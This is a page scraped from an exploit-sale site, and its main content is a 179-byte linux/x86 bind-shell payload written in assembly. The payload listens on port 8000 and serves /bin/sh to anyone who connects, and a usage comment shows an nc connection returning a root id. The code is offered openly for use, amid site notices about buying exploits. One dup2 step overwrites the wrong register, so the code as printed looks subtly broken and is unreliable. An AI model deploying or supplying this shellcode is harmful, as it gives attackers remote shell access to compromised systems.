0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 Bind ASM Code Linux 179 bytes
======================================= linux/x86 Bind ASM Code Linux 179 bytes ======================================= ; ; Title : Bind asm code Linux x86 - 179 bytes ; IP : 0.0.0.0 ; Port : 8000 ; ; ; Use : nc localhost 8000 ; id ; uid=0(root) gid=0(root) groupes=0(root) ; ; ; Author : Jonathan Salwan ; section .data name db '/bin/sh', 0 section .text global _start _start: ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; push byte 0x0 push byte 0x1 push byte 0x2 mov eax, 0x66 mov ebx, 0x1 mov ecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; mov edx, eax ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; push byte 0x0 push byte 0x0 push byte 0x0 push word 0x401f push word 0x2 mov ebx, esp push byte 0x10 push ebx push edx mov eax, 0x66 mov ebx, 0x2 mov ecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; push byte 0x1 push edx mov eax, 0x66 mov ebx, 0x4 mov ecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; push byte 0x0 push byte 0x0 push edx mov eax, 0x66 mov ebx, 0x5 mov ecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; mov edx, eax ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; mov eax, 0x3f mov ebx, edx mov ebx, 0x2 int 0x80 mov eax, 0x3f mov ebx, edx mov ecx, 0x1 int 0x80 mov eax, 0x3f mov ebx, edx mov ecx, 0x0 int 0x80 ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; mov al, 0x0b mov ebx, name push byte 0x0 push name mov ecx, esp mov edx, 0x0 int 0x80 ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; # 0day.today [2024-12-27] #